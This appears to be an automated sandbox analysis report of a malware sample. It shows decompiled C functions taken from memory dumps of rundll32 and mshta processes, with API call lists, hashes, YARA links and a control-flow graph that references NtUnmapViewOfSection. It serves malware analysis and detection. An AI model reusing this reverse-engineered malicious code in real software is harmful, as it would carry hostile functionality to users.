                                      • memset.NTDLL ref: 04DE372A
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: memset$_allmul_aulldiv
                                      • String ID:
                                      • API String ID: 3041852380-0
                                      • Opcode ID: f8287eef836e79344c9ac9972d872ee1dc1142d2fa10e547c11d3be85ff916db
                                      • Instruction ID: c351e2e998c991871fc93ef4b8cb06c0a7407a7da71b18c1ac77c68f0f8d9b32
                                      • Opcode Fuzzy Hash: f8287eef836e79344c9ac9972d872ee1dc1142d2fa10e547c11d3be85ff916db
                                      • Instruction Fuzzy Hash: 2F418F71B00219AFEB10BE6ACC40BFE77B5EF45714F104569F91997280DB70BA448BA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE51D7 Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 78%
                                      			E04DE51D7(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E04DE4DF6(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                      0x04de51e3
                                      0x04de51e7
                                      0x04de51e8
                                      0x04de51e9
                                      0x04de51eb
                                      0x04de51ed
                                      0x04de51f0
                                      0x04de51f5
                                      0x04de528c
                                      0x04de5293
                                      0x04de5293
                                      0x04de51fe
                                      0x04de5205
                                      0x04de5215
                                      0x04de5215
                                      0x04de521b
                                      0x04de521d
                                      0x04de5222
                                      0x04de522b
                                      0x04de5231
                                      0x04de5236
                                      0x04de5241
                                      0x04de5245
                                      0x04de5247
                                      0x04de5248
                                      0x04de5251
                                      0x04de5255
                                      0x04de5266
                                      0x04de5257
                                      0x04de525c
                                      0x04de5261
                                      0x04de5270
                                      0x04de5270
                                      0x04de5245
                                      0x04de5276
                                      0x04de527c
                                      0x04de527c
                                      0x04de5285
                                      0x04de528a
                                      0x04de528a
                                      0x00000000

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: FreeSleepStringlstrlenmemcpy
                                      • String ID:
                                      • API String ID: 1198164300-0
                                      • Opcode ID: b5c640fa2b2e0510d73b127f3c408f66871593049b927ff380fb0e7949672850
                                      • Instruction ID: db49e085c97aa16913daab1ab0da13e57f8663dc100a3794348bdf97a5e77c49
                                      • Opcode Fuzzy Hash: b5c640fa2b2e0510d73b127f3c408f66871593049b927ff380fb0e7949672850
                                      • Instruction Fuzzy Hash: 8F214175A01209FFCB11EFE5D9949AEBBB4FF49345B1041A9E901E7311EB70EA01CB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE24BC Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E04DE24BC(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}






                                      0x04de24c6
                                      0x04de24ca
                                      0x04de24df
                                      0x04de24e1
                                      0x04de24e6
                                      0x04de24ec
                                      0x04de24ee
                                      0x04de24f3
                                      0x04de24fe
                                      0x04de24f5
                                      0x04de24f5
                                      0x04de24f5
                                      0x04de24f3
                                      0x04de250c

                                      APIs
                                      • memset.NTDLL ref: 04DE24CA
                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,770481D0), ref: 04DE24DF
                                      • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 04DE24EC
                                      • CloseHandle.KERNEL32(?), ref: 04DE24FE
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: CreateEvent$CloseHandlememset
                                      • String ID:
                                      • API String ID: 2812548120-0
                                      • Opcode ID: 030b9df0babda94885d27c3b22748c67622d76ddc0f1ad58221f3b616355b5d5
                                      • Instruction ID: 6e4d09c7412e5b11707a43d4798d91977f2b358c69d09fe46307300b0c78f38d
                                      • Opcode Fuzzy Hash: 030b9df0babda94885d27c3b22748c67622d76ddc0f1ad58221f3b616355b5d5
                                      • Instruction Fuzzy Hash: DCF05EF120530C7FD310BF27DCC4C37BBACEB962ACB11496EF14682501D676AC098A60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE5976 Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E04DE5976() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x4dea30c; // 0x2d4
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x4dea35c; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x4dea30c; // 0x2d4
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x4dea2d8; // 0x50b0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                      0x04de5976
                                      0x04de597d
                                      0x04de59c7
                                      0x04de59c9
                                      0x04de59c9
                                      0x04de5981
                                      0x04de5987
                                      0x04de598c
                                      0x04de5990
                                      0x04de5996
                                      0x04de599d
                                      0x00000000
                                      0x00000000
                                      0x04de599f
                                      0x04de59a4
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x04de59a4
                                      0x04de59a6
                                      0x04de59ae
                                      0x04de59b1
                                      0x04de59b1
                                      0x04de59b7
                                      0x04de59be
                                      0x04de59c1
                                      0x04de59c1
                                      0x00000000

                                      APIs
                                      • SetEvent.KERNEL32(000002D4,00000001,04DE3DC4), ref: 04DE5981
                                      • SleepEx.KERNEL32(00000064,00000001), ref: 04DE5990
                                      • CloseHandle.KERNEL32(000002D4), ref: 04DE59B1
                                      • HeapDestroy.KERNEL32(050B0000), ref: 04DE59C1
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: CloseDestroyEventHandleHeapSleep
                                      • String ID:
                                      • API String ID: 4109453060-0
                                      • Opcode ID: 7033bc296a3f0d918ff069832b1634cb3ad7c6b1b139c7d76d6e0177fcbe5d3b
                                      • Instruction ID: f09ced64ce4295c1ff5967a8cde275475fda379b83b8699c0a781858fc10a788
                                      • Opcode Fuzzy Hash: 7033bc296a3f0d918ff069832b1634cb3ad7c6b1b139c7d76d6e0177fcbe5d3b
                                      • Instruction Fuzzy Hash: B5F09E75B02312A7DE10BBB7EC78AA63B98EB057B5B444154AD05DA385DB29EC408960
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE3F7E Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 37%
                                      			E04DE3F7E() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x4dea3cc; // 0x54a95b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x4dea3cc; // 0x54a95b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x4dea3cc; // 0x54a95b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x4deb81a) {
					HeapFree( *0x4dea2d8, 0, _t10);
					_t7 =  *0x4dea3cc; // 0x54a95b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                      0x04de3f7e
                                      0x04de3f87
                                      0x04de3f97
                                      0x04de3f97
                                      0x04de3f9c
                                      0x04de3fa1
                                      0x00000000
                                      0x00000000
                                      0x04de3f91
                                      0x04de3f91
                                      0x04de3fa3
                                      0x04de3fa8
                                      0x04de3fac
                                      0x04de3fbf
                                      0x04de3fc5
                                      0x04de3fc5
                                      0x04de3fce
                                      0x04de3fd0
                                      0x04de3fd4
                                      0x04de3fda

                                      APIs
                                      • RtlEnterCriticalSection.NTDLL(054A9570), ref: 04DE3F87
                                      • Sleep.KERNEL32(0000000A), ref: 04DE3F91
                                      • HeapFree.KERNEL32(00000000), ref: 04DE3FBF
                                      • RtlLeaveCriticalSection.NTDLL(054A9570), ref: 04DE3FD4
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                      • String ID:
                                      • API String ID: 58946197-0
                                      • Opcode ID: 8218c0e4d659da4f4e527b29ef5ff4de8383e781de45938b1daf3aeedfb7b7f2
                                      • Instruction ID: 715aff88ce7fcee298be1c9dcb1b54099b70567a32e1ba78b568e2bb94910294
                                      • Opcode Fuzzy Hash: 8218c0e4d659da4f4e527b29ef5ff4de8383e781de45938b1daf3aeedfb7b7f2
                                      • Instruction Fuzzy Hash: 48F0D4B43412029FEB18FF97E8A9A353BB4EB44301B09504AE902DB390C638FC00DA24
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE5296 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 58%
                                      			E04DE5296(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E04DE4DF6(_t2);
				if(_t34 != 0) {
					_t30 = E04DE4DF6(_t28);
					if(_t30 == 0) {
						E04DE4C73(_t34);
					} else {
						_t39 = _a4;
						_t22 = E04DE79D7(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E04DE79D7(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                      0x04de5296
                                      0x04de52a0
                                      0x04de52a2
                                      0x04de52a8
                                      0x04de52a8
                                      0x04de52b1
                                      0x04de52b5
                                      0x04de52c1
                                      0x04de52c5
                                      0x04de5339
                                      0x04de52c7
                                      0x04de52c7
                                      0x04de52cb
                                      0x04de52d0
                                      0x04de52d5
                                      0x04de52ef
                                      0x04de52de
                                      0x04de52de
                                      0x04de52e2
                                      0x04de52e5
                                      0x04de52ea
                                      0x04de52ea
                                      0x04de52f4
                                      0x04de531c
                                      0x04de5322
                                      0x04de5325
                                      0x04de52f6
                                      0x04de52f8
                                      0x04de5300
                                      0x04de530b
                                      0x04de5310
                                      0x04de5310
                                      0x04de532c
                                      0x04de5333
                                      0x04de5334
                                      0x04de5334
                                      0x04de52c5
                                      0x04de5344

                                      APIs
                                      • lstrlen.KERNEL32(00000000,00000008,?,77004D40,?,?,04DE4BF5,?,?,?,?,00000102,04DE5388,?,?,00000000), ref: 04DE52A2
                                        • Part of subcall function 04DE4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04DE5522), ref: 04DE4E02
                                        • Part of subcall function 04DE79D7: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04DE52D0,00000000,00000001,00000001,?,?,04DE4BF5,?,?,?,?,00000102), ref: 04DE79E5
                                        • Part of subcall function 04DE79D7: StrChrA.SHLWAPI(?,0000003F,?,?,04DE4BF5,?,?,?,?,00000102,04DE5388,?,?,00000000,00000000), ref: 04DE79EF
                                      • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04DE4BF5,?,?,?,?,00000102,04DE5388,?), ref: 04DE5300
                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 04DE5310
                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 04DE531C
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                      • String ID:
                                      • API String ID: 3767559652-0
                                      • Opcode ID: 9bda6e6b66fde297b4c59000ae70eb18c55151474192af3df6a42d37fb2f5c2d
                                      • Instruction ID: e260b75bc71c1c102de94d885b8da0d536754962784470b39eb4aeb2f76cfea2
                                      • Opcode Fuzzy Hash: 9bda6e6b66fde297b4c59000ae70eb18c55151474192af3df6a42d37fb2f5c2d
                                      • Instruction Fuzzy Hash: 5321D272600259BBCF127FBAD864ABE7FB9EF16298B444051F9059F211E774E901C7B0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE6203 Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E04DE6203(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E04DE4DF6(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                      0x04de6218
                                      0x04de621c
                                      0x04de6226
                                      0x04de622b
                                      0x04de6230
                                      0x04de6232
                                      0x04de623a
                                      0x04de623f
                                      0x04de624d
                                      0x04de6252
                                      0x04de625c

                                      APIs
                                      • lstrlenW.KERNEL32(004F0053,?,77005520,00000008,054A93CC,?,04DE6861,004F0053,054A93CC,?,?,?,?,?,?,04DE6BB4), ref: 04DE6213
                                      • lstrlenW.KERNEL32(04DE6861,?,04DE6861,004F0053,054A93CC,?,?,?,?,?,?,04DE6BB4), ref: 04DE621A
                                        • Part of subcall function 04DE4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04DE5522), ref: 04DE4E02
                                      • memcpy.NTDLL(00000000,004F0053,770069A0,?,?,04DE6861,004F0053,054A93CC,?,?,?,?,?,?,04DE6BB4), ref: 04DE623A
                                      • memcpy.NTDLL(770069A0,04DE6861,00000002,00000000,004F0053,770069A0,?,?,04DE6861,004F0053,054A93CC), ref: 04DE624D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: lstrlenmemcpy$AllocateHeap
                                      • String ID:
                                      • API String ID: 2411391700-0
                                      • Opcode ID: c347ba94257a18e6fcf7944e7471ab75b536840df9a7d26889698b93ea5fecbd
                                      • Instruction ID: 30c363123045cec53e55db6571afb39ec80b9fdbba4fc0f1c9bd1e87aaefd5b7
                                      • Opcode Fuzzy Hash: c347ba94257a18e6fcf7944e7471ab75b536840df9a7d26889698b93ea5fecbd
                                      • Instruction Fuzzy Hash: D8F0F976A00119BB9F11EFAACC89CDF7BACEF493587554062FD04D7202E635EA149BA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE3970 Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlen.KERNEL32(054A9B90,00000000,00000000,76D8C740,04DE6568,00000000), ref: 04DE3980
                                      • lstrlen.KERNEL32(?), ref: 04DE3988
                                        • Part of subcall function 04DE4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04DE5522), ref: 04DE4E02
                                      • lstrcpy.KERNEL32(00000000,054A9B90), ref: 04DE399C
                                      • lstrcat.KERNEL32(00000000,?), ref: 04DE39A7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                      • String ID:
                                      • API String ID: 74227042-0
                                      • Opcode ID: 100cf4bc3ccf0376213ceb34e2e900e846d10ee9df568ff7817ef07687460eb9
                                      • Instruction ID: 77ffdae3aeed064c1b8d668339d123a2a9830c601d9aa4ef2e1be0a117ab9a0a
                                      • Opcode Fuzzy Hash: 100cf4bc3ccf0376213ceb34e2e900e846d10ee9df568ff7817ef07687460eb9
                                      • Instruction Fuzzy Hash: F3E09BB3602521678711BBE69C58CABB7ACEF896617040456FA00D7300D7299C01C7B1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Executed Functions

                                      Function 000002B3E6870FB9 Relevance: .0, Instructions: 5COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000013.00000003.453688904.000002B3E6870000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002B3E6870000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_3_2b3e6870000_mshta.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                      • Instruction ID: dfbd2dbc5f03ba530c6a9a479f73a46e5d13e5bc31164c3ba5cc008e9638deaa
                                      • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                      • Instruction Fuzzy Hash: F49004444DD41F55D41451D10C5D35C714077CC350FD444C14417D01C5D5CD73D75157
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 000002B3E6870FC1 Relevance: .0, Instructions: 5COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000013.00000003.453688904.000002B3E6870000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002B3E6870000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_3_2b3e6870000_mshta.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                      • Instruction ID: dfbd2dbc5f03ba530c6a9a479f73a46e5d13e5bc31164c3ba5cc008e9638deaa
                                      • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                      • Instruction Fuzzy Hash: F49004444DD41F55D41451D10C5D35C714077CC350FD444C14417D01C5D5CD73D75157
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Executed Functions

                                      Function 000002DC007F8D20 Relevance: 5.9, APIs: 2, Strings: 1, Instructions: 648COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 2dc007f8d20-2dc007f8d7c 1 2dc007f8d93-2dc007f8d9b 0->1 2 2dc007f8d7e-2dc007f8d91 0->2 3 2dc007f8da0-2dc007f8da8 1->3 2->3 4 2dc007f8daa-2dc007f8dad 3->4 5 2dc007f8db2-2dc007f8dba 3->5 6 2dc007f93be-2dc007f93da 4->6 7 2dc007f8dff-2dc007f8e09 5->7 8 2dc007f8dbc-2dc007f8dd9 5->8 9 2dc007f8e0f-2dc007f8e1f 7->9 10 2dc007f933e 7->10 16 2dc007f8ddb-2dc007f8dde 8->16 17 2dc007f8de3-2dc007f8dfd call 2dc00806da0 8->17 9->10 13 2dc007f8e25-2dc007f8e31 9->13 12 2dc007f9343-2dc007f9346 10->12 18 2dc007f9348-2dc007f9352 NtUnmapViewOfSection 12->18 19 2dc007f9357-2dc007f935a 12->19 14 2dc007f8e37-2dc007f8e3f 13->14 15 2dc007f9064-2dc007f9068 13->15 20 2dc007f8e45-2dc007f8e80 call 2dc007f59d4 14->20 21 2dc007f906e-2dc007f9073 14->21 15->20 15->21 22 2dc007f9395-2dc007f939d 16->22 17->7 18->19 24 2dc007f9390-2dc007f9391 19->24 25 2dc007f935c-2dc007f9367 19->25 35 2dc007f9337-2dc007f933c 20->35 36 2dc007f8e86-2dc007f8ebc call 2dc008010b4 20->36 21->22 22->6 29 2dc007f939f-2dc007f93b6 call 2dc008151f8 22->29 24->22 26 2dc007f9369-2dc007f936b 25->26 27 2dc007f9372-2dc007f9388 25->27 26->27 31 2dc007f936d-2dc007f9370 26->31 27->24 29->6 31->24 35->12 36->12 41 2dc007f8ec2-2dc007f8ed6 call 2dc007fc558 36->41 41->12 44 2dc007f8edc-2dc007f8edf 41->44 45 2dc007f8ee1-2dc007f8eeb call 2dc007f41aa 44->45 46 2dc007f8ef0-2dc007f8ef5 44->46 45->46 48 2dc007f8ef7-2dc007f8eff 46->48 49 2dc007f8f22-2dc007f8f48 call 2dc007f41aa 46->49 48->49 51 2dc007f8f01-2dc007f8f02 48->51 54 2dc007f8f5b-2dc007f8f5f 49->54 55 2dc007f8f4a-2dc007f8f58 49->55 52 2dc007f8f05-2dc007f8f20 51->52 52->49 52->52 56 2dc007f8f78-2dc007f8f85 54->56 57 2dc007f8f61-2dc007f8f75 54->57 55->54 58 2dc007f8f8b-2dc007f8fb5 56->58 59 2dc007f9078-2dc007f907f 56->59 57->56 60 2dc007f8fb7-2dc007f8fbe 58->60 61 2dc007f8fcd-2dc007f8ff0 call 2dc00816c40 58->61 62 2dc007f9097-2dc007f90bc 59->62 63 2dc007f9081-2dc007f9088 59->63 60->61 64 2dc007f8fc0-2dc007f8fc7 60->64 72 2dc007f9148-2dc007f914a 61->72 73 2dc007f8ff6-2dc007f901d call 2dc00816c40 61->73 62->72 74 2dc007f90c2-2dc007f90e6 call 2dc007f87dc 62->74 63->62 65 2dc007f908a-2dc007f9091 63->65 64->61 67 2dc007f9052-2dc007f905f 64->67 65->62 68 2dc007f9136-2dc007f913a 65->68 71 2dc007f9140-2dc007f9143 call 2dc007f41aa 67->71 68->71 71->72 72->12 76 2dc007f9150-2dc007f9194 call 2dc007f41aa 72->76 73->72 82 2dc007f9023-2dc007f904a call 2dc00816c40 73->82 74->72 83 2dc007f90e8-2dc007f910c call 2dc007f87dc 74->83 90 2dc007f919a-2dc007f91df call 2dc008151f8 * 2 76->90 91 2dc007f931c-2dc007f931e 76->91 82->72 92 2dc007f9050 82->92 83->72 93 2dc007f910e-2dc007f9132 call 2dc007f87dc 83->93 103 2dc007f92eb-2dc007f92f2 90->103 104 2dc007f91e5-2dc007f9212 call 2dc00813fd4 90->104 91->12 96 2dc007f9320-2dc007f932b 91->96 92->67 93->72 101 2dc007f9134 93->101 96->12 99 2dc007f932d-2dc007f9335 96->99 99->12 101->68 110 2dc007f92fb 103->110 111 2dc007f92f4-2dc007f92f9 103->111 108 2dc007f9218-2dc007f9225 104->108 109 2dc007f9302-2dc007f9308 104->109 113 2dc007f9227-2dc007f923b 108->113 114 2dc007f923d-2dc007f923f 108->114 115 2dc007f930a-2dc007f9314 109->115 112 2dc007f92fd-2dc007f9300 110->112 111->115 112->109 112->115 